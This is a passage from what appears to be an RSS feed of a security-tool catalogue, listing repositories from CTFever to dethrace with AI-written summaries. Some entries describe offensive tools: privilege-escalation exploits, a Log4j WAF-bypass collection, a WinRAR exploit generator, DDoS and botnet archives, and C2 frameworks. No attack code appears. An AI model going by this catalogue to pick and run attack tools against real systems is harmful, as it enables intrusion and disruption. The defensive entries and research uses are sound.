&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CTFever is a comprehensive toolkit designed for Capture The Flag (CTF) participants, offering a variety of utilities to assist in solving challenges. It includes a range of tools for tasks such as encoding/decoding, cryptography, and data analysis, featuring notable options like Base64 encoding, Caesar ciphers, and hash calculations. This resource is particularly beneficial for cybersecurity enthusiasts engaged in competitive environments, aiming to streamline their workflow and enhance their problem-solving capabilities.&lt;/p&gt;</description></item><item><title>ctfr</title><link>https://rainmana.github.io/hackyfeed/tools/unapibageek-ctfr/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/unapibageek-ctfr/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CTFR is a tool designed to extract subdomains from HTTPS websites by leveraging Certificate Transparency logs, rather than employing conventional dictionary or brute-force attacks. Its primary use case is for cybersecurity professionals and researchers to quickly enumerate subdomains for a given target domain, with features that allow output to a specified file. The tool is straightforward to install and run, requiring only Python and pip, and offers a simple command-line interface for usage.&lt;/p&gt;</description></item><item><title>CTFs</title><link>https://rainmana.github.io/hackyfeed/tools/adamkadaban-ctfs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/adamkadaban-ctfs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CTFs is a repository containing write-ups and resources for various Cyber Capture The Flag (CTF) challenges. It offers a comprehensive cheat sheet detailing strategies and techniques across diverse categories, including forensics, binary exploitation, web challenges, and cryptography. Notable features include curated educational resources, practice sites, and a web mirror for easy access.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ctfs"&gt;CTFs&lt;/h1&gt;
&lt;p&gt;Writeups / Files for some of the Cyber CTFs that I&amp;rsquo;ve done&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ve also included a list of &lt;strong&gt;CTF resources&lt;/strong&gt; as well as a comprehensive &lt;strong&gt;cheat sheet&lt;/strong&gt; covering tons of common CTF challenges&lt;/p&gt;</description></item><item><title>ctftool</title><link>https://rainmana.github.io/hackyfeed/tools/taviso-ctftool/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/taviso-ctftool/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ctftool is an interactive command-line tool designed for exploring and experimenting with the CTF protocol used in Windows for Text Services. Its primary use case includes studying Windows internals, debugging Text Input Processors, and analyzing security within the CTF environment, with notable features such as support for scripting, automated interactions, and various commands for managing connections and clients. The tool is compatible with Windows 7, 8, and 10, supporting both 32-bit and x64 architectures.&lt;/p&gt;</description></item><item><title>cve</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-cve/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-cve/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CVE PoC tool aggregates nearly every publicly available Proof-of-Concept (PoC) for Common Vulnerabilities and Exposures (CVEs), providing a comprehensive database of exploits for security professionals. It employs automated workflows to scrape and validate CVE details from various sources, including GitHub and HackerOne reports, while also allowing users to browse, search, and monitor PoCs for specific vulnerabilities. Noteworthy features include real-time updates, easy-to-read markdown documentation, and the ability to generate GitHub badges for affected software versions.&lt;/p&gt;</description></item><item><title>CVE-2020-0796</title><link>https://rainmana.github.io/hackyfeed/tools/danigargu-cve-2020-0796/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danigargu-cve-2020-0796/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CVE-2020-0796 is a Windows SMBv3 local privilege escalation exploit that targets a vulnerability in the SMB protocol, enabling unauthorized users to elevate their permissions. The tool includes proof of concept (PoC) and analysis references for users seeking to understand and replicate the exploit. Notable features include detailed documentation and references to further resources for in-depth exploitation and analysis of the vulnerability.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cve-2020-0796"&gt;CVE-2020-0796&lt;/h1&gt;
&lt;p&gt;Windows SMBv3 LPE Exploit&lt;/p&gt;
&lt;p&gt;&lt;img src="https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif" alt="exploit"&gt;&lt;/p&gt;</description></item><item><title>CVE-2021-44228-PoC-log4j-bypass-words</title><link>https://rainmana.github.io/hackyfeed/tools/puliczek-cve-2021-44228-poc-log4j-bypass-words/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/puliczek-cve-2021-44228-poc-log4j-bypass-words/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CVE-2021-44228-PoC-log4j-bypass-words tool demonstrates various methods to exploit the Apache Log4j vulnerability, specifically focusing on bypassing WAF protections and patched versions. It provides multiple techniques, including the use of system environment variables, case manipulation, and invalid Unicode to obfuscate the exploit strings. Notable features include dynamic manipulation of Java naming lookups and the ability to use non-existent lookups for stealthy exploitation attempts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center" &gt;🤝 Show your support - give a ⭐️ if you liked the content | &lt;a target="_blank" href='https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2FPuliczek%2FCVE-2021-44228-PoC-log4j-bypass-words&amp;via=pulik_io&amp;text=%20LOG4J%20Java%20exploit%20-%20WAF%20and%20patches%20bypass%20tricks'&gt;SHARE on Twitter&lt;/a&gt;
| Follow me on
 &lt;a target="_blank" href='https://twitter.com/pulik_io'&gt;&lt;img src='https://img.shields.io/badge/Twitter-%231DA1F2.svg?&amp;style=flat&amp;logo=twitter&amp;logoColor=white'/&gt;&lt;/a&gt;
 &lt;a target="_blank" href='https://www.youtube.com/channel/UCaAdOBH2hnqLvEri1M7eg5Q'&gt;&lt;img src='https://img.shields.io/badge/YouTube-%23FF0000.svg?&amp;style=flat&amp;logo=youtube&amp;logoColor=white'/&gt;&lt;/a&gt;
&lt;/div&gt;
&lt;hr&gt;
&lt;h1 id="---log4j-java-exploit---waf-and-patches-bypass-tricks"&gt;&lt;strong&gt;🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tricks&lt;/strong&gt;&lt;/h1&gt;
&lt;h1 id="-description"&gt;📝 Description&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;CVE-2021-44228&lt;/strong&gt; works on:&lt;/p&gt;</description></item><item><title>CVE-2023-38831-winrar-exploit</title><link>https://rainmana.github.io/hackyfeed/tools/b1tg-cve-2023-38831-winrar-exploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/b1tg-cve-2023-38831-winrar-exploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CVE-2023-38831 winrar exploit generator is a tool designed to create proof-of-concept (PoC) exploits for a recently discovered vulnerability in WinRAR versions up to 6.22. It allows users to customize bait files, such as images or documents, along with malicious script files to generate a malicious RAR archive. Notable features include an easy-to-use command-line interface for generating exploits and the ability to customize payloads according to user specifications.&lt;/p&gt;</description></item><item><title>CVE-2024-1086</title><link>https://rainmana.github.io/hackyfeed/tools/notselwyn-cve-2024-1086/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/notselwyn-cve-2024-1086/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CVE-2024-1086 is a universal local privilege escalation exploit targeting Linux kernels from v5.14 to v6.6, with a notable success rate of 99.4% in KernelCTF environments. It allows users to gain root access under specific conditions related to user namespaces and kernel configurations, while also showcasing a deliberate kernel panic after execution to deter malicious exploitation. The tool includes both source code for building as well as a compiled binary for ease of use.&lt;/p&gt;</description></item><item><title>cve-bin-tool</title><link>https://rainmana.github.io/hackyfeed/tools/ossf-cve-bin-tool/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ossf-cve-bin-tool/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CVE-bin-tool is a static analysis tool designed to identify vulnerable dependencies in binary artifacts by comparing them against known Common Vulnerabilities and Exposures (CVEs). Its primary use case is to streamline the security assessment process in software projects, enabling developers to detect and remediate vulnerabilities efficiently. Notable features include support for various package formats, a comprehensive vulnerability database, and integration capabilities with CI/CD pipelines for automated security checks.&lt;/p&gt;</description></item><item><title>CyberSecurity</title><link>https://rainmana.github.io/hackyfeed/tools/berkanktk-cybersecurity/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/berkanktk-cybersecurity/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CyberSecurity repository offers a comprehensive collection of resources and tools aimed at individuals interested in cybersecurity, encompassing a wide range of topics from security models and threat identification to practical tools for ethical hacking. Notable features include a curated list of command-line and graphical user interface tools for pentesting, along with educational content covering ethical and legal aspects, security frameworks, and network fundamentals. This repository serves as a valuable reference for both newcomers and experienced professionals in the cybersecurity domain.&lt;/p&gt;</description></item><item><title>cybersecurity-career-path</title><link>https://rainmana.github.io/hackyfeed/tools/rezaduty-cybersecurity-career-path/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rezaduty-cybersecurity-career-path/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The cybersecurity-career-path repository provides a comprehensive guide to various career trajectories within cybersecurity, detailing essential skills, training, and resources for both offensive and defensive roles. Notable features include a structured overview of job titles, practical utilities, and a free platform called Career Coach for personalized career advancement. It serves as a valuable resource for individuals at any stage of their cybersecurity journey.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="allv1.png" alt="ROADMAP"&gt;&lt;/p&gt;
&lt;h1 id="update-weve-expanded-our-repository-with-complete-career-paths-essential-skills-training-and-a-ton-of-practical-utilities-and-materials-named-career-coach--all-available-for-free-whether-youre-just-starting-out-or-looking-to-level-up-enroll-in-any-career-path-at-no-cost-keep-progressing-and-fuel-your-professional-growth-with-these-comprehensive-tools-designed-to-help-you-succeed-check-out-our-app-for-seamless-access-and-personalized-guidance-career-coach-career-coach"&gt;UPDATE: We&amp;rsquo;ve expanded our repository with complete career paths, essential skills training, and a ton of practical utilities and materials named &lt;a href="https://career.hadess.io"&gt;Career Coach&lt;/a&gt; ; all available for free! Whether you&amp;rsquo;re just starting out or looking to level up, enroll in any career path at no cost, keep progressing, and fuel your professional growth with these comprehensive tools designed to help you succeed. Check out our app for seamless access and personalized guidance! &lt;a href="https://career.hadess.io"&gt;Career Coach&lt;/a&gt; &lt;a href="https://career.hadess.io"&gt;&lt;img src="https://img.shields.io/badge/CLICK%20ME-8A2BE2" alt="Career Coach"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;Cybersecurity Career Path ⬆️&lt;/p&gt;</description></item><item><title>Cybersecurity-Projects</title><link>https://rainmana.github.io/hackyfeed/tools/carterperez-dev-cybersecurity-projects/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/carterperez-dev-cybersecurity-projects/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Cybersecurity Projects repository offers a collection of 67 hands-on projects spanning from beginner to advanced levels, designed to enhance practical skills in cybersecurity. It includes structured certification roadmaps for various roles within the field, as well as a comprehensive array of learning resources such as tools, courses, and frameworks for cybersecurity professionals. Notable features include the full source code availability for projects, covering diverse topics like port scanning, keylogging, and encryption techniques.&lt;/p&gt;</description></item><item><title>CyberStrikeAI</title><link>https://rainmana.github.io/hackyfeed/tools/ed1s0nz-cyberstrikeai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ed1s0nz-cyberstrikeai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CyberStrikeAI is an AI-integrated security testing platform developed in Go, designed for automated vulnerability discovery and attack-chain analysis. It features a vast integration of over 100 security tools, AI-driven orchestration, role-based testing, and lifecycle management to create a collaborative and auditable environment for security teams. Notable features include a web console, AI decision engine with OpenAI compatibility, detailed vulnerability management, and a comprehensive knowledge base for enhanced security expertise.&lt;/p&gt;</description></item><item><title>Damn-Vulnerable-Bank</title><link>https://rainmana.github.io/hackyfeed/tools/rewanthtammana-damn-vulnerable-bank/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rewanthtammana-damn-vulnerable-bank/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Damn Vulnerable Bank is an intentionally vulnerable Android application designed to educate users on security flaws in banking apps. Its primary use case is for security professionals and developers to explore various vulnerabilities, such as root detection and insecure storage, by interacting with features like user registration, fund transfers, and transaction history. Notable features include fingerprint and PIN verification for transactions, as well as a gamified approach to discovering hidden vulnerabilities within the app.&lt;/p&gt;</description></item><item><title>DataSurgeon</title><link>https://rainmana.github.io/hackyfeed/tools/drew-alleman-datasurgeon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/drew-alleman-datasurgeon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DataSurgeon is a comprehensive tool for extracting sensitive information pertinent to incident response, DLP, penetration testing, and CTF challenges. It supports extraction of a wide range of data types—including emails, credit cards, URLs, and various hashes—across multiple operating systems, and features a plugin management system that allows users to extend its functionality. Notable features include recursive file analysis, CSV output capabilities, and multi-platform support enabling usage on Windows, Linux, and macOS.&lt;/p&gt;</description></item><item><title>DDexec</title><link>https://rainmana.github.io/hackyfeed/tools/arget13-ddexec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/arget13-ddexec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DDexec is a sophisticated tool designed for executing binaries by manipulating existing processes on Linux systems, utilizing memory hijacking techniques. Its notable features include the ability to run machine code directly, support for various shells, and the option to replace traditional file access methods with alternative seeking tools, which can obfuscate executable detection. The utility&amp;rsquo;s architecture minimizes dependencies, enhancing performance and potentially expanding compatibility to platforms like Android.&lt;/p&gt;</description></item><item><title>ddisasm</title><link>https://rainmana.github.io/hackyfeed/tools/grammatech-ddisasm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/grammatech-ddisasm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DDisasm is a high-performance disassembler that accurately translates binaries from ELF and PE formats into a reassemblable assembly code representation using the GTIRB intermediate format. Utilizing the Datalog declarative logic programming language, it derives code locations, symbolization, and function boundaries, supporting multiple instruction set architectures including x86, ARM, and MIPS. Notable features include Docker support for easy setup and integration with GTIRB for further binary analysis and manipulation.&lt;/p&gt;</description></item><item><title>DDoS-Ripper</title><link>https://rainmana.github.io/hackyfeed/tools/palahsu-ddos-ripper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/palahsu-ddos-ripper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DDoS-Ripper is a Python-based tool designed to simulate Distributed Denial-of-Service (DDoS) attacks for educational and testing purposes. It supports various operating systems, including Linux, Termux, Windows, and MacOS, and allows users to specify the target IP address and intensity of the attack through command line parameters. Notable features include multi-platform compatibility and straightforward installation instructions, emphasizing an ethical usage disclaimer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ddos-ripper"&gt;DDoS-Ripper&lt;/h1&gt;
&lt;h1 id="what-is-a-ddos-attack"&gt;What is a DDoS Attack?&lt;/h1&gt;
&lt;p&gt;A Distributable Denied-of-Service (DDOS) attack server that cuts off targets or surrounding infrastructure in a flood of Internet traffic&lt;/p&gt;</description></item><item><title>DDOS-RootSec</title><link>https://rainmana.github.io/hackyfeed/tools/r00ts3c-ddos-rootsec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r00ts3c-ddos-rootsec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The RootSec Archive is a comprehensive collection of tools and resources designed for conducting Distributed Denial-of-Service (DDoS) attacks, vulnerability scanning, and botnet management. Notable features include a variety of botnet variants (such as Mirai and QBot), password cracking tools, real-time statistics through DStat, and C2 sources for effective botnet control. This archive serves both as a point of reference and a toolkit for security testing and exploitation practices.&lt;/p&gt;</description></item><item><title>DeathStar</title><link>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-deathstar/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-deathstar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeathStar is a Python script designed to automate the exploitation of misconfigurations within Active Directory environments to attain Domain and Enterprise Admin rights by leveraging the RESTful API of the Empire framework. Notable features include a plugin system for extensibility, support for multiple Active Directory domains and forests, real-time adaptive monitoring during attacks, and a fully asynchronous operation model. This tool aims to provide a comprehensive solution for demonstrating prevalent Active Directory vulnerabilities in a reliable and non-disruptive manner.&lt;/p&gt;</description></item><item><title>DeauthDetector</title><link>https://rainmana.github.io/hackyfeed/tools/spacehuhntech-deauthdetector/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/spacehuhntech-deauthdetector/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeauthDetector is an open-source tool designed to monitor and detect Wi-Fi deauthentication attacks using an ESP8266 microcontroller. Its primary use case involves real-time identification of malicious deauth frames, indicated by an LED activation, making it an effective low-cost solution for network security monitoring. Notable features include customizable scanning options, support for multiple channels, and easy installation via precompiled binaries or Arduino integration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="deauthdetector"&gt;DeauthDetector&lt;/h1&gt;
&lt;p&gt;Detect deauthentication frames using an ESP8266&lt;/p&gt;</description></item><item><title>debundle</title><link>https://rainmana.github.io/hackyfeed/tools/1egoman-debundle/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1egoman-debundle/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Debundle is a tool designed to unpack JavaScript bundles generated by Webpack and Browserify, facilitating reverse engineering and analysis by converting minified code back into a more readable file structure. Notably, it allows users to specify configuration options for various bundling types and outputs organized directories containing the original modules, though it does not guarantee a lossless recovery of the original source code. The project is no longer maintained, and users are advised to exercise caution as it may not perform reliably on all real-world bundles.&lt;/p&gt;</description></item><item><title>Decepticon</title><link>https://rainmana.github.io/hackyfeed/tools/purpleailab-decepticon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/purpleailab-decepticon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Decepticon is a Vibe Hacking agent designed to streamline the red teaming process by utilizing AI to automate repetitive tasks such as scanning, service enumeration, and executing multi-stage attacks. Its primary use case is in penetration testing, where it simulates real-world attack scenarios to evaluate an organization&amp;rsquo;s security posture effectively. Notable features include the ability to handle the full kill chain, integrate with AI API keys, and operate within a Docker environment for ease of deployment.&lt;/p&gt;</description></item><item><title>DedSec</title><link>https://rainmana.github.io/hackyfeed/tools/dedsec1121fk-dedsec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dedsec1121fk-dedsec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DedSec Project is an educational toolkit designed for Android using Termux, integrating various scripts, utilities, and local web interfaces to facilitate learning about cybersecurity tools and workflows. It aims to enhance users&amp;rsquo; understanding of defensive awareness through practical exercises and organized scripts, while supporting both English and Greek interfaces. Notable features include a comprehensive installation guide, diverse categories of tools, and a focus on educational usage, including personal information capture and simulated environments.&lt;/p&gt;</description></item><item><title>deepce</title><link>https://rainmana.github.io/hackyfeed/tools/stealthcopter-deepce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/stealthcopter-deepce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeepCE is a lightweight tool designed for Docker container enumeration, privilege escalation, and container escapes, written in pure shell script to maximize compatibility. It performs a variety of enumerations, including container-specific data collection and host system scanning, and offers multiple exploits such as Docker group privilege escalation and command execution in privileged mode. Notably, DeepCE minimizes disk writes during enumeration, making it suitable for stealthy assessments in containerized environments.&lt;/p&gt;</description></item><item><title>DeepTraffic</title><link>https://rainmana.github.io/hackyfeed/tools/echowei-deeptraffic/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/echowei-deeptraffic/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeepTraffic is a toolkit that employs deep learning models specifically for the classification of network traffic, focusing on identifying malware and anomalies. Its primary application lies in enhancing cybersecurity measures through effective traffic analysis and representation learning using convolutional neural networks. Notable features include end-to-end encrypted traffic classification and the ability to learn hierarchical spatial-temporal features for improved intrusion detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="deep-learning-models-for-network-traffic-classification"&gt;Deep Learning models for network traffic classification&lt;/h1&gt;
&lt;p&gt;For more information please read our papers.&lt;br&gt;&lt;/p&gt;</description></item><item><title>DefaultCreds-cheat-sheet</title><link>https://rainmana.github.io/hackyfeed/tools/ihebski-defaultcreds-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ihebski-defaultcreds-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Default Credentials Cheat Sheet is a tool designed for penetration testers and blue teamers, providing a comprehensive repository of default login credentials for various products to aid in security assessments. Notable features include a searchable database of over 3,700 default credentials, the ability to export results for use in brute force attacks, and automated updates to maintain current data. The tool is easily installable via pip and supports operations across multiple operating systems.&lt;/p&gt;</description></item><item><title>DEFCON-31-Syscalls-Workshop</title><link>https://rainmana.github.io/hackyfeed/tools/virtualalllocex-defcon-31-syscalls-workshop/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/virtualalllocex-defcon-31-syscalls-workshop/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DEFCON 31 Syscalls Workshop repository provides educational materials focusing on direct and indirect syscalls within Windows operating systems, particularly aimed at enhancing understanding of Win32 and Native APIs for Red Team activities. It includes theoretical content, practical exercises, and proof of concepts (POCs) to facilitate learning about syscall mechanisms and their implications in EDR evasion. Notable features include an emphasis on manual techniques over complex automation, offering foundational insights into call stacks and shellcode execution dynamics.&lt;/p&gt;</description></item><item><title>DeimosC2</title><link>https://rainmana.github.io/hackyfeed/tools/deimosc2-deimosc2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/deimosc2-deimosc2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DeimosC2 is a deprecated post-exploitation Command &amp;amp; Control (C2) tool designed to facilitate control over compromised machines across multiple operating systems including Windows, macOS, and Linux. Its notable features include dynamic agent generation, diverse communication methods (TCP, HTTPS, DoH, and QUIC), a graphical interface for managing listeners and agents, and robust security measures such as multi-user support and two-factor authentication. However, it is important to note that the tool has a known XSS vulnerability and is no longer maintained.&lt;/p&gt;</description></item><item><title>dembrandt</title><link>https://rainmana.github.io/hackyfeed/tools/dembrandt-dembrandt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dembrandt-dembrandt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dembrandt is a command-line tool designed to extract design systems from any website into structured design tokens, including elements such as colors, typography, and components. Its notable features include the ability to generate a brand guide PDF, output data in W3C Design Tokens format, and support for various browser configurations to bypass bot protection on target sites. The tool is easily installed via npm and offers a range of options for customization and output format.&lt;/p&gt;</description></item><item><title>dep-scan</title><link>https://rainmana.github.io/hackyfeed/tools/owasp-dep-scan-dep-scan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owasp-dep-scan-dep-scan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP dep-scan is an advanced security audit tool designed for analyzing project dependencies against known vulnerabilities, advisories, and license issues, applicable to both local repositories and container images. Its primary use case is to facilitate integration within Application Security Posture Management (ASPM) and Vulnerability Management (VM) platforms, especially in Continuous Integration (CI) environments. Notable features include advanced reachability analysis, fast local vulnerability scanning without a server, generation of Software Bills of Materials (SBOM), and clear insights for prioritization of vulnerabilities.&lt;/p&gt;</description></item><item><title>destroylist</title><link>https://rainmana.github.io/hackyfeed/tools/phishdestroy-destroylist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/phishdestroy-destroylist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Destroylist is a comprehensive phishing and scam domain blacklist that provides real-time threat intelligence to protect users globally. This tool maintains an extensive database of over 100,000 phishing domains and features active statistics on domain additions and removals, ensuring up-to-date protection against online threats. The repository supports community contributions, fostering collaborative efforts in enhancing online security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="destroylist-phishing--scam-domain-blacklist"&gt;&lt;img src="https://raw.githubusercontent.com/Tarikul-Islam-Anik/Animated-Fluent-Emojis/master/Emojis/Activities/Performing%20Arts.png" alt="Performing Arts" width="28" height="28" /&gt; Destroylist: Phishing &amp;amp; Scam Domain Blacklist&lt;/h1&gt;
&lt;p&gt;&lt;img src="scripts/destroyolist_image.png" alt="Destroyolist Illustration"&gt;&lt;/p&gt;</description></item><item><title>DetectDee</title><link>https://rainmana.github.io/hackyfeed/tools/willin22-detectdee/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/willin22-detectdee/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DetectDee is a reconnaissance tool designed to track down social media accounts using identifiers such as usernames, emails, and phone numbers across various social networks. Notable features include precise control over request handling to evade web application firewalls, support for multiple input types for user detection, and the option for integration with ChatGPT for enhanced result tagging. Its extensibility and ease of use make it suitable for cybersecurity practitioners in their investigations.&lt;/p&gt;</description></item><item><title>dethrace</title><link>https://rainmana.github.io/hackyfeed/tools/dethrace-labs-dethrace/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dethrace-labs-dethrace/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dethrace is a recreation project aimed at reverse-engineering the 1997 game Carmageddon to enable it to run natively on contemporary systems. The tool supports building with CMake and SDL2, and allows users to leverage original game assets or demo versions for gameplay. Notably, it offers configuration options through an INI file and supports CD audio playback from compatible folders, enhancing the authenticity of the gaming experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="dethrace"&gt;Dethrace&lt;/h1&gt;
